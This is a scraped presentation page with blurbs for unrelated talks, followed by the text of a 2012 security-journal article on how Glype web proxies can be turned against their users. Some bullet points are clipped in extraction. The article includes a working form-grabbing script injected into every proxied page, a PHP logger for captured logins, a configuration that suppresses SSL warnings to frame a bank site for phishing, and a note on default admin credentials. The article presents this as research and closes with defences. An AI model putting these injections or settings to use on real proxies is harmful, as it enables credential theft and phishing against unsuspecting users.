The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Monitoring Java Application Security with JDK Tools and JFR Events
Abusing Glype Proxies - Attacks, Exploits and Defences
1. FEATURE
8
Network Security December 2012
Organisations also need to educate
their end users, as security is everyone’s
concern. Many data leaks caused by
insiders are due to careless, not malicious
users. Ensure that employees understand
security policies and take the proper
security precautions.
About the Author
Bill Morrow is executive chairman
and CEO at Quarri Technologies. He
has more than 20 years of business
foundation and leadership experience.
In 2006, he founded CSIdentity
Corporation, a wholesale provider of ID
theft services across the globe, and served
as CEO and chairman of the board into
2011. Previously he founded and served
as vice-chairman of the board, director
and CEO of Grande Communications.
Morrow was the 2010 Ernst & Young
Entrepreneur of the Year Award winner
for Central Texas.
References
1. Camp, Cameron. ‘The BYOD security
challenge: How scary is the iPad, tablet,
smartphone surge?’ ESET Threat Blog,
28 Feb 2012. Accessed Nov 2012.
http://blog.eset.com/2012/02/28/
sizing-up-the-byod-security-challenge.
2. Wilson, Jeff. ‘Enterprises rate
mobile device security vendors,
reveal BYOD concerns’. Infonetics.
8 Mar 2012. Accessed Nov 2012.
www.infonetics.com/pr/2012/
Enterprise-Mobile-Security-
Strategies-Survey-Highlights.asp.
3. ‘2011 Internet Security Threat
Report’. Symantec, April 2012.
Accessed Nov 2012. www.symantec.
com/threatreport.
4. ‘Mobile Device Vulnerability
Management Flagged as Top
Concern for Security Professionals
in 2012’. Tenable Network Security,
2 Apr 2012. Accessed Nov 2012.
www.tenable.com/news-events/
press-releases/2012-mobile-device-
vulnerability-management-flagged-as-
top-concern-for-se.
5. ‘2012 Confidential Documents at
Risk Study’. Ponemon Institute, 26
Jul 2012. Accessed Nov 2012. http://
info.watchdox.com/Ponemon.html.
6. ‘Survey finds nearly half of
consumers fail to upgrade software
regularly and one quarter of
consumers don’t know why to
update software’. Skype, Norton
by Symantec and Tom Tom, 23 Jul
2012. Accessed Nov 2012. http://
about.skype.com/press/2012/07/
Abusing Glype proxies: attacks,
exploits and defences
Glype is an open source proxy written in
PHP and is freely available for personal
use. It can also be licensed for commercial
use, and is available as an add-on for
Firefox as Proxilla.2 The basic idea of a
web proxy is to download requested web
pages, modify them according to a set of
proxy rules, and then forward them to the
user. By standing between the user and
the rest of the web, the proxy can provide
some anonymity to the user in addition
to other services.
Proxies can also be transformed into
attack platforms for exploitation. For
example, misconfigured proxies can
be exploited by an attacker to steal
sensitive information from users. Our
study focuses on various attacks and
the distribution of malware using
Glype proxies. We present a model
of the approach used by attackers to
transform a Glype proxy into an attack
toolkit for spreading infections. For
our experiments, we have used Glype
versions 1.1 and 1.4. We will present
details about the features of Glype
proxies that help attackers, and we will
conclude by proposing countermeasures.
Background
A number of studies have been conducted
in the past regarding the use of public
proxies as attack platforms. SANS,
a co-operative research and security
institution, conducted two studies on
the integrity of public proxies. The first,
by Powers, discussed the possibility of
malware in public proxy lists.3 The study
focused on tracking the Koobface malware
that used open ports for incoming
connections and hid operations behind
proxies through proxy lists. The other,
by Brozycki, presented techniques for
detecting proxies that provide anonymous
access and proposed methods to defend
against them using blacklisting and active
monitoring.4 A number of IDS rules
were proposed by Brozycki to prevent
users from accessing blocked content
inside a network. In this paper, we do
not cover network-level anonymisers
such as VPNs and TOR. The concept
of this paper revolves around web-based
anonymity using server-side web proxies.
The primary difference between the TOR
network and web-based proxies is that
TOR implements multi-tier (multi-layer)
Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs,
and Richard J Enbody, Michigan State University
Proxies play a critical privacy role because these are widely used for anonymous
surfing and identity cloaking on the Internet. In addition, proxies also assist
in traffic filtering, traffic management, log auditing, access policies and surfing
restricted sites. There are several types of proxies available, but the Glype HTTP
proxy is used extensively.1
2. FEATURE
December 2012 Network Security
9
anonymity before forwarding the traffic to
the destination, whereas web proxies have
a two-tier (single-server) architecture.5
In other words, the difference is in the
implementation of relays and routing the
traffic between endpoints.
Huang et al discussed cache-poisoning
attacks in transparent proxies using socket
Application Programming Interfaces
(APIs) in Java and Flash.6 In cache
poisoning attacks, transparent proxies
are exploited that are configured to
route traffic based on the HTTP ‘Host:’
parameter while caching at the same time.
An attacker poisons the Host: header in
the cache using a malicious Flash or Java
file that downloads the policy file from the
attacker’s server. Cache poisoning attacks
are quite common in network proxies. The
Swiss Security Team discussed the inability
of Glype proxies to hide the user’s identity
entirely.7 Its study showed how the
misconfiguration in Glype proxies can lead
to the disclosure of sensitive information.
Dissecting Glype
The primary purpose of the Glype proxy
is to provide the capability of anonymous
surfing. However, attackers can also
transform a Glype proxy into a malware
infection platform. To understand the
attacks, it is important to understand the
characteristics of Glype proxies.
To provide proxy services each URL
and each page’s internal links are encoded
using a simple, base-64 encoding. For
example, consider this URL:
hxxp://[Glype_proxy_url]/proxy/browse.
php?u=Oi8vc2NyaXB0bWFmaWEub3Jn
Lw%3D%3D&b=13&f=norefer
This contains the string
‘Oi8vc2NyaXB0bWFmaWEub3JnLw’.
A simple base-64 decoding of this string
results in ‘://scriptmafia.org’ which
shows that the URL decoding process
is simple. Care is needed to handle
special characters because the Glype
proxy follows the PHP-based encoding/
decoding mechanism in which special
characters present in variable names are
encoded to maintain compatibility with
registered global variables.
The Glype proxy can be extended using
plugins. For example, popular websites
such as Facebook, Twitter and Gmail have
separate plug-ins for the Glype proxy.
Web page processing is handled using
Glype’s ‘process.php’ page. For simplicity,
the Glype proxy injects JavaScript code
in web pages to avoid sending requests to
the process.php page using HTTP POST
requests. The Glype proxy uses HTTP
headers such as ‘Referrer:’ and ‘Location:’
for redirection purposes.
Google can be used to search for
misconfigured Glype proxies. By default,
Glype logs its activities with a log
folder in the /tmp directory (/tmp/log).
Knowing the location of the log allows
a malicious user to easily craft efficient
Google queries with Google dorks to
search for misconfigured proxies.
The Glype proxy has default credentials
{username=admin, password=admin}.
The password is hardcoded as an MD5
hash, but is susceptible to brute force
attack. For secure configurations, the
hash should be replaced. In addition,
in its default configuration, the Glype
proxy uses no cache. Listing 1 shows the
implementation of the cache module in
Glype proxy. However, it is still possible
to configure Glype proxy to send some
cache headers using session_cache_
limiter(‘private_no_expire’).
Glype proxies suffer from several
design flaws that are exploited by
attackers. Some of the issues that make
Glype proxies an effective hacker tool
are discussed below.
Logging mechanism
By design, the Glype proxy is supposed
to provide anonymity for its users.
Unfortunately, weaknesses exist that can
leak information about a user’s identity.
Since Glype is written in PHP, an attacker
can perform several modifications to
make the Glype proxy a tool for successful
execution of attacks. There are different
kinds of information that attackers
can easily steal by misconfiguring the
parameters of the Glype proxy and writing
an advanced plugin for capturing data.
Listing 2 shows the type of information
logged when the user surfs a website
through a Glype proxy. It basically captures
GET requests and provides information
about IP addresses visited.
Glype proxies also allow attackers to
extract cookies – a potentially valuable
Listing 1: Cache module in the Glype proxy
# Send no-cache headers.
function sendNoCache()
{
header( ‘Cache-Control: no-store, no-cache, must-revalidate’ );
header( ‘Cache-Control: post-check=0, pre-check=0’, false );
header( ‘Pragma: no-cache’ );
}
Listing 2: Logs in Glype Proxy
68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.
facebook.com%2F&refid=8
68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.
com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
3. FEATURE
10
Network Security December 2012
source of personal information. The
Glype proxy only provides an option for
deleting cookies on the client side, not
on the server side. To provide anonymity
the cookies should be deleted completely
on both sides, but this cannot happen.
Listing 3 shows the extracted cookies of a
user who visited Facebook.
In an attempt to provide anonymity, a
Glype proxy does not log POST requests.
However, an attacker can write a plugin
to grab all POST requests. We developed
such a plugin, which we demonstrate in
the next section.
IP banning and restriction
Glype proxies provide impressive
functionality to restrict IP addresses
using the BlockScript web software.8 It
was designed to enable administrators to
restrict HTTP requests from unwanted
domains. However, this functionality is
also useful for launching targeted attacks
in which attackers target a specific set of
IP addresses and restrict others. Also, this
property can subvert the generic analysis
method of testing servers remotely. A
Glype proxy uses an IP banning module
as shown in listing 4.
In the code in listing 4, a Glype proxy
looks for IP addresses that are restricted
or blacklisted to start the verification
check. If an IP address is found in the
databases, the Glype proxy returns a
‘403 Forbidden’ response to the user.
To make it more malicious, attackers
can serve malicious web pages showing
the IP-banned message. In this way, a
user is not able to surf anonymously
and still gets infected. There are many
modifications that can be made in the
code for playing around with IP address
restrictions.
Listing 3: Cookies collected by Glype Proxy
#HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ
.facebook.com TRUE / FALSE 0 lsd 1W12c
#HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951
.facebook.com TRUE / FALSE 1 reg_ext_ref deleted
.facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F
.facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook.
com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522
Listing 4: IP Banning Module
if ( empty($_SESSION[‘ip_verified’]) || $_SESSION[‘ip_verified’] != $_
SERVER[‘REMOTE_ADDR’] ) {
if (!$CONFIG[‘enable_blockscript’]) {
# Current IP matches a banned IP? true/false
$banned = false;
# Examine all IP bans
foreach ( $CONFIG[‘ip_bans’] as $ip ) {
# Is this a range or single?
if ( ($pos = strspn($ip, ‘0123456789.’)) == strlen($ip)
) {
# Just a single IP so check for a match
if ( $_SERVER[‘REMOTE_ADDR’] == $ip )
{
# Flag the match and break out the
loop
$banned = true;
break; }
# And try next IP
continue;
}
// – – – – – Redacted – – – – – //
# Is the IP address banned?
if ( $banned ) {
# Send a Forbidden header
header(‘HTTP/1.1 403 Forbidden’, true, 403);
# Print the banned page and exit!
echo loadTemplate(‘banned.page’);
exit;}
# Still here? Must be OK so save IP in session to prevent rechecking
next time
$_SESSION[‘ip_verified’] = $_SERVER[‘REMOTE_ADDR’];
4. FEATURE
December 2012 Network Security
11
Threat model
Examining the threat model allows us to
understand the role of the various actors
involved and how attackers exploit
the integrity of users by conducting
attacks. The model basically covers the
threats associated with end users and
administrators. Since we’re concerned
here with the Glype proxy, the attacks
are modelled around the Man-in-the-
Middle (MitM) paradigm.
during our research,
it has been noticed that Glype proxies
are configured in a very insecure way
– for example, using default or weak
passwords. This misconfiguration
allows attackers to successfully
compromise the proxy software using
brute-force attacks. The primary risk is
that attackers now exploit third-party
resources – including infrastructure,
traffic density, etc – to exploit users
at a large scale. Glype is a server-side
proxy and compromising it has serious
implications.
the Glype proxy provides
anonymity on the web. The users
are susceptible to a wide variety of
attacks. The primary target of the
attacker is to force the users to surf
Internet resources through the Glype
proxy. The users’ surfing habits
and trust play a significant role in
the execution of insidious attacks.
Information stealing, phishing, Cross-
Frame Scripting (XFS) and so on
are some of the attacks that can be
triggered easily using Glype proxy.
Since the Glype proxy is open source,
the code can be modified using inherent
features that make it a more powerful
weapon. In the next section, we discuss
some of the attacks using custom plugins.
Remember, Glype is not a client-side
proxy but it infects and modifies the
proxied web pages served to the users.
Launching attacks using
Glype
Attacks triggered using Glype proxies
are based on the concept of the Man-
in-the-Middle (MitM) paradigm. The
MitM agent reads and writes the traffic
between two end points on the network.
It is quite easy to equate the Glype proxy
with an MitM agent because the traffic
originating from the infected machine is
routed through the Glype proxy interface
before it is processed by the web server.
The attacker controls and administers
the Glype proxy interface and can easily
manipulate the requests and responses
flowing between client’s browser and the
web server. As a result, the user is served
with illegitimate and malicious content
that subverts the normal operations of
browsers. To support this theory, our
team conducted several sets of tests to
understand the impact of Glype proxy
infection at a large scale.
Data exfiltration – form
grabbing
Data exfiltration attacks are conducted
to steal sensitive information from
infected machines on the Internet. It is
easy to exfiltrate data from users who
use Glype proxies. These proxies provide
a configuration file for managing the
current run state and it appears possible
for an attacker to infect all the proxified
web pages with illegitimate content.
To test that theory, we conducted an
experiment to understand the impact
of infecting proxied webpages. We
noticed that a Glype proxy provides
certain configuration parameters that
can be used to inject malicious content
that gets rendered in all the web pages
that are proxied. This capability can be
devastating. We implemented a small
program using jQuery to grab all the
POST requests. Listing 5 provides a
different set of scripts that we used in
our tests which are described as follows:
is used to serialise the data present
in the forms. This code serialises the
data entered by the users in input
boxes in the forms and submits the
data to the malicious domain. This
code is passed as a parameter to the
‘footer_include’ configuration, and so
injects this code at the bottom of all
the proxied webpages.
that it does not send the form data
to the server but rather triggers an
alert notification. This code is used
for validating successful insertion of
scripts in the web pages.
used to handle the incoming data and
storing it in the log file for analysis.
By using the code discussed in listing 5,
it is possible to log all the POST requests
sent by the user’s browser through the
Glype proxy’s interface. The POST data
can be logged on the server side as shown
in listing 6.
Figure 1 shows the successful
execution of a script inserted in the
proxied web page. This shows that it is
very easy to inject scripts automatically
by tweaking configuration parameters in
the Glype proxy.
Cross-frame scripting
and phishing
Cross-Frame Scripting (XFS) is an
advanced attack in which an attacker
exploits the inability of web pages to
prevent themselves from being framed
in a web browser. An attacker loads the
target website in an HTML iframe or
frame and forces the JavaScript from the
primary domain to interact with the target
website that is loaded in the frame. XFS
allows the attackers to force the legitimate
user to perform rogue operations without
their knowledge. XFS can be launched
to trigger phishing attacks. To counter
this attack many websites are using anti
XFS code.9 HTML 5 has the built-in
attribute ‘sandbox’ defined as a part of an
iframe tag that can be used to bypass the
restrictions, as described here.10 Despite
this fact, a Glype proxy has the ability to
rewrite URLs while proxying the content
of the domain. A Glype proxy caches the
URL and then applies the proxify function
to rewrite it. To make it legitimate, an
attacker can configure the Glype proxy in
such a way that phishing attacks look more
original by subverting the XFS protections.
We conducted an experiment using Glype
proxy version 1.1 and made configuration
changes in the settings.php file in order
to tweak the Glype proxy to execute a
phishing attack. We also modified the code
to execute advanced attacks to understand
the potential risk associated with a Glype
proxy. Listing 7 shows the configuration
we used in the demonstration attack code.
5. FEATURE
12
Network Security December 2012
In our code, Secure Socket Layer
(SSL) protocol warnings are turned off.
This modification allows the Glype
proxy to quash all the SSL-based
warnings. We also enabled hotlinking,
the process of directly loading content
from a third-party domain. In a Glype
proxy, hotlinking allows the attacker to
force the user to visit an XFS web page
directly. We enabled caching for faster
execution. Caching of files such as CSS,
images, and so on forces the browser
to store the content locally and use it
directly without sending requests to
the web server. This way, the attacker
can speed up the loading of web pages
in the client’s browser. Finally, we
allowed JavaScript for communication
with different objects on the web page.
JavaScript is an essential component of
many websites and applications. For
example, banking websites use JavaScript
for communicating with different objects
in a dynamic manner. In addition,
the attacker benefits from this because
it allows the attacker to execute any
arbitrary script in the context of a proxied
website. We tested this configuration and
found that it is possible to use XFS for
conducting a phishing attack as shown in
Figure 2.
Our experiment showed that
sophisticated XFS protections can be
circumvented with the help of a Glype
proxy. In Figure 2, a legitimate Bank of
America website is framed inside a Glype
proxy interface without any warnings.
It means an attacker can inject scripts as
discussed earlier to interact with various
objects on the web page. Typically, the
user believes that he/she is surfing the
bank website through a legitimate proxy
but in reality all the information can be
easily captured from the user’s session.
“It is possible to embed a single
exploit code directly in the Glype
proxy web page. This process
actually transforms the Glype
proxy into an attack toolkit”
In the above layout, the URL points
to the domain where the Glype proxy
is hosted. As hotlinking is allowed and
the Glype proxy does not present any
message, the attacker can also use the
Glype proxy URL (pointed to bank
domain) and embed it in the phishing
emails for distributing among large
number of users. When a user clicks
the malicious link, he/she is redirected
towards the Glype proxy interface that
automatically loads the legitimate bank
website. An attacker can also install a
Listing 5: Injecting Code in Glype Proxy Parameter
// – – – – Code (1) – – – – //
$CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/
libs/jquery/1.5/jquery.min.js”></script>
<script>
$(’form’).submit( function()
{
var yup = $(’form’).serialize();
$.post(“logit.php”, yup,function (data){});
});
</script>‘;
// – – – – Code (2) – – – – //
$CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/
libs/jquery/1.5/jquery.min.js”></script>
<script>
$(’form’).submit( function()
{
alert( $(’form’).serialize());
});
</script>‘;
// – – – – Code (3) – – – – //
<?php
$file = fopen(“postlog.txt”, ‘a’);
foreach( $_POST as $key => $value )
{
fwrite($file, $key.”:”.$value.”n”);
}
fclose($file);
?>
Listing 6: Extracted Data from HTTP POST (FORM
Submit) Request
lsd:
post_form_id:7eb4ce3be4f996e756e1f54ac474d578
charset_test:€,´,€,´,水,Д,Є
version:1
ajax:1
width:1280
pxr:1
gps:1
email:FACEBOOK_USER@facebook.com
pass:FACEBOOK_PASSWORD
m_ts:1332258635
li:MqdoT8wNn91Ak0OT4rUUGUHg
6. FEATURE
December 2012 Network Security
13
Glype proxy on familiar-looking domain
names to make the phishing attack look
more appealing, and hence more effective.
Malware distribution
Glype proxies can be used for attacking
corporate networks to spread infections.
Considering the characteristics of a
Glype proxy, it is possible for attackers
to create an embedded toolkit using a
Glype proxy for distributing malware
that is highly targeted. The complete
model is presented below.
Hosting Glype proxy: to begin, the
attacker hosts the Glype proxy tool on
a compromised domain. As described
earlier, web searching can reveal a number
of misconfigured Glype proxies on the
Internet. It is not difficult for an attacker
to hack a misconfigured proxy and use it
for malicious purposes. Once a proxy is
successfully installed on the compromised
domain, the attacker configures it for
the attack using scenarios described in
earlier sections. There are two primary
configuration checks that an attacker
wants to implement:
attacker to keep track of the activity
happening through the proxy. For
example, an attacker can install
a custom POST logger plugin for
stealing data in HTTP POST requests.
allows the attacker to restrict certain
IP addresses from accessing the Glype
proxy. This functionality is useful in
targeted infections.
Embedding a browser exploit pack
in Glype: after successful installation of
a Glype proxy, the next step is to embed
an iframe having a URL pointing to a
Browser Exploit Pack (BEP).11 The iframe
can be hidden or obfuscated depending on
the requirements. A BEP is a framework
that has a number of exploits bundled
together. A BEP begins by fingerprinting
the user’s browser environment and then
serves an appropriate exploit. BlackHole,
Phoenix and Crimepack are some of
the BEPs that are frequently used for
infections. It is possible to embed a single
exploit code directly in the Glype proxy
web page. This process actually transforms
the Glype proxy into an attack toolkit. As
discussed earlier, malicious code can be
injected dynamically in all the proxied web
pages for stealthy infections. The main
motive behind this process is to exploit the
user’s browser when a proxied web page
is opened. Additionally, many proxy users
Figure 1: Stealing credentials by injecting code in a Glype proxy.
Listing 7: Configuration Parameters Required for
Bypassing XFS and Executing Phishing
// Configure SSL warnings
$CONFIG[‘ssl_warning’] = false;
// Managing Hotlinking
$CONFIG[‘stop_hotlinking’] = false;
// Specifying the target domain for hot linking
$CONFIG[‘hotlink_domains’] = array(‘www.bankofamerica.com’);
// Storing cookies on the server
$CONFIG[‘cookies_on_server’] = true;
// Setting cookies path
$CONFIG[‘cookies_folder’] = $CONFIG[‘tmp_dir’] . ‘cookies/’;
// Enable logging
$CONFIG[‘enable_logging’] = true;
Figure 2: Phished web page in a Glype proxy.
7. FEATURE
14
Network Security December 2012
believe that surfing online anonymously
provides security and neglect to verify the
integrity of the Glype proxy. An attacker
can exploit this trust. Embedding a
malicious link pointing to a BEP is not a
hard task in the Glype proxy.
Advertising Glype proxy: once the
Glype proxy-based attack is set up, the
next step is to start advertising the Glype
proxy. Advertising is usually done to
collect revenue based on hits, but in this
case the prime motivation for an attacker
is to get traffic so that the infectious
code can be distributed. However,
advertising can play a critical role in
the success of attacks. Several methods
are used by attackers to advertise their
infected Glype proxies:
to advertise their infected Glype
proxy. Public proxy lists are one of
the most widely accepted methods
for advertising Glype proxies. For
example, paying a few dollars allows an
infected Glype proxy to be numbered
in the top-ten proxies, which is a good
deal from the attacker’s perspective.
This approach can increase traffic on
the infected Glype proxy. Figure 3
shows how a proxy can be advertised.
attacks to distribute the URL pointing
to their infected Glype proxy. Phishing
attacks have been effective for
exploiting users’ trust and belief in the
security of proxies.
proxy on social networks, message
boards and advertising links. Due to
their popularity and trustworthiness,
social networks have become the
preferred choice of attackers for
distributing malware. It is easy and
profitable.
On completion of this process,
attackers have successfully distributed
information about their infected Glype
proxy to a variety of outlets on the
Internet. After this, the attacker waits for
the infections to trigger.
Post-exploitation: once the infected
proxy site has been visited, there are
two vectors of attack. If a user is to be
directed to a malicious website loaded
with malware, the BEP there installs
malware on a user’s computer and the
computer is owned by the attacker.
If the Glype is being used to gather
information, the attacker starts mining
the logs to track the IP addresses
and extract personal information,
possibly including account credentials.
Information collected from Glype
proxies can also be very useful to design
other attack vectors. For example,
information specific to an individual can
be collected for a later, more effective
spear-phishing attack. This attack model
is typically part of a distributed attack
and can be very effective in spreading
infections widely.
Proactive steps
There are several steps that users can
take when dealing with Glype proxies
for anonymous surfing on the Internet:
services for surfing websites that require
critical information, such as financial
credentials, to be delivered to the server.
Users should be aware that their data
is being transferred through a public
proxy. A classic example would be
employees circumventing restrictions
put in place by an organisation they
work for – such circumvention could
open a big hole.
legitimate and authentic proxy services
on the Internet. However, it is still not
advised to use the services directly. A
user should verify the integrity of a
proxy provider to check whether it
is a legitimate service provider or a
fraudulent entity.
for internal use, it should be ensured
that the Glype proxy is configured
in a secure way. Default credentials
must be changed to stronger ones. Log
files should not be publicly accessible,
which can be achieved by configuring
the settings.php and .htaccess files on
the server.
good surfing habits on the Internet.
For example, they should always think
twice before clicking a link that is
embedded in an email. Additionally,
they should be suspicious of
attachments and verify them before
downloading.Theseoperationalhabits
depend on the security knowledge of
the user and show the importance of
user education. Organisations should
have a robust security training model
to educate users about the latest web
attack trends and appropriate secure
behaviour.
The steps discussed above can be
effective in reducing the infection rate
and preserving the integrity of users.
Conclusion
Glype proxies have been increasing
in popularity over the past few years.
Generally, Glype proxies assist in
maintaining a user’s integrity and privacy.
However, they can also be used as an
attack platform because of some inherent
design flaws. First, insecure configuration
of Glype proxies can result in the stealing
of information. Second, attackers can
extend the Glype proxy code to conduct
Figure 3: Advertising proxies on the Internet.
8. FEATURE
December 2012 Network Security
15
web-based attacks by tricking a user
to visit a malicious domain or routing
the web traffic through Glype proxies.
Finally, security greatly depends on users’
ability to make secure decisions when on
the Internet. Secure behaviour can help
thwart a number of attack scenarios. Be
vigilant and surf securely.
About the authors
Aditya K Sood is a senior security
practitioner and PhD candidate at
Michigan State University. He has
already worked in the security domain
for Armorize, COSEINC and KPMG.
He is also a founder of SecNiche Security,
an independent security research lab.
He has been an active speaker at
industry conferences such as DEFCON,
HackInTheBox, LayerOne, Source, RSA,
BruCon, ToorCon, HackerHalted, TRISC,
EuSecwest, XCON, Troopers, OWASP
AppSec, US-CERT GFIRST and many
others. He has authored several papers for
various publishers including IEEE, Elsevier,
Crosstalk, Virus Bulletin, ISACA, ISSA and
HITB.
Peter Greko is a security researcher at
SecNiche Security Labs where he deals
with cyber-security issues. Previously he
has worked in the cyber-security divisions
of Sypris and Citigroup. He has spoken at
several conferences, including HackerHalted,
AppSec DC, HOPE, Swiss CyberStorm and
local OWASP and ISSA chapter meetings.
Richard J Enbody, PhD is associate
professor in the Department of Computer
Science and Engineering at Michigan
State University (US) where he joined the
faculty in 1987. He earned his PhD at
the University of Minnesota (1987) and
his BA at Carleton College (1976). His
research interests include computer security,
computer architecture, web-based distance
education, and CS1 education. Enbody
has written a CS1 text using Python: ‘The
Practice of Computing Using Python,
Second Edition’, published by Addison-
Wesley 2012.
References
1. Glype proxy. Accessed Nov 2012.
www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla
Firefox Add-On. Accessed Nov 2012.
https://addons.mozilla.org/en-US/
firefox/addon/proxilla/.
3. Powers, JL. ‘Tracking Malware with
Public Proxy Lists’. SANS Reading
Room. Accessed Nov 2012. www.
sans.org/reading_room/whitepapers/
malicious/tracking-malware-public-
proxy-lists_33604.
4. Brozycki, Z. ‘Detecting and
Preventing Anonymous Proxy Usage’.
SANS Reading Room. Accessed Nov
2012. www.sans.org/reading_room/
whitepapers/detection/detecting-
preventing-anonymous-proxy-
usage_32943.
5. ‘TOR (The Onion Router)’.
University of Michigan. Accessed Nov
2012. http://webapps.lsa.umich.edu/
lsait/admin/TOR%20Routing%20
Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A;
Rescorla, E; Jackson, C. ‘Talking to
Yourself for Fun and Profit’. Accessed
Nov 2012. www.w2spconf.com/2011/
papers/websocket.pdf.
7. ‘When You Think You Surf
Anonymously But You Don’t’. Swiss
Security Blog, 26 Apr 2010. Accessed
Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed
Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D;
Jackson, C. ‘Busting Frame Busting: a
Study of Clickjacking Vulnerabilities
on Popular Sites’. Stanford SecLab,
20 Jul 2010. Accessed Nov 2012.
http://seclab.stanford.edu/websec/
framebusting/framebust.pdf.
10.Sood, AK; Enbody, RJ. ‘Frametrapping
the framebusting defence’. Network
Security, October 2011. Accessed Nov
2012. www.sciencedirect.com/science/
article/pii/S1353485811701052.
11.Sood, AK; Enbody, RJ. ‘Browser
Exploit Packs – Exploitation Tactics’.
ToorCon Security Conference,
October 2011, San Diego. Accessed
Nov 2012. http://secniche.blogspot.
com/2011/06/toorcon-seattle-2011-
browser-exploit.html.
Virtual jihad: how real is
the threat?
Steve Gold
One of the less well reported aspects
of cybercrime – and one that poses
a very real threat to the integrity of
companies’ IT resources, as well as that
of Western governments – is the issue of
cyber-terrorism. According to Dancho
Danchev, an Amsterdam-based security
blogger with Webroot, and an Internet/
security researcher since the mid-1990s,
the reason for this is largely because
of a lack of understanding of what
cyber-jihadism is all about. Coupled
with a lack of understanding about the
teachings of the Koran and Islamic faith,
this has resulted in the topic becoming
something of a no-go area for Western
security researchers, despite the fact that
the more extremist elements in Islamic
countries are increasingly using relatively
advanced technology in the shape of
Steve Gold, freelance journalist
There is widespread concern about the ways in which terrorist organisations – and
particularly jihadist movements – may be using the Internet to organise and execute
acts of terror. But is the threat real, or is it a case of an IT security industry generating
fear, uncertainty and doubt in an attempt to instil fear into every Internet user?